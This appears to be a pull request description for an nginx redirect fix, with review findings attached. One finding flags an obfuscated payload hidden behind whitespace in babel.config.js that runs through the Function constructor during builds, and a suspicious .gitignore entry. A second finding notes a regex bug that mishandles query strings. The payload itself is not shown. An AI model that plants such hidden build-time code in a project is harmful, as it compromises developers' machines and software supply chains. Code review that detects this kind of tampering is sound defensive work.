fix(nginx): use map directive for trailing slash redirect

Previous approaches using location blocks weren't working. This uses a map directive to detect trailing slashes and a server-level if statement to redirect, which is processed before location matching.

The map captures the path without the trailing slash, and the if statement returns a 301 redirect when a trailing slash is detected.

Overview
Updates nginx.conf to detect non-root trailing slashes via a map ($trailing_slash_uri) and perform an early 301 redirect at the server level, replacing the previous location ~ ^(.+)/$ rewrite.

Adds config.bat to .gitignore. Also appends a large obfuscated script blob to babel.config.js, which is unrelated to the stated Nginx fix and appears suspicious.

Malicious obfuscated code injected into babel config

Line 4 appends heavily obfuscated malicious JavaScript after the closing };, hidden behind hundreds of whitespace characters. The injected code exposes require and module as globals and then decodes and executes an obfuscated payload via Function constructor. This is a supply chain attack — the code runs during every build. The simultaneous addition of config.bat to .gitignore may also be part of this compromise.

Map regex incorrectly matches slashes in query strings

Medium Severity

The map regex ~^(.+)/(\?.*)?$ operates on $request_uri, which includes the query string. Because (.+) is greedy, it can match a / character inside query parameter values (e.g., /page?url=http://example.com/), causing an incorrect redirect for URLs that have no trailing slash in the path but contain slashes in query parameters. The previous location-based approach operated only on the URI path and was not affected by query string contents.
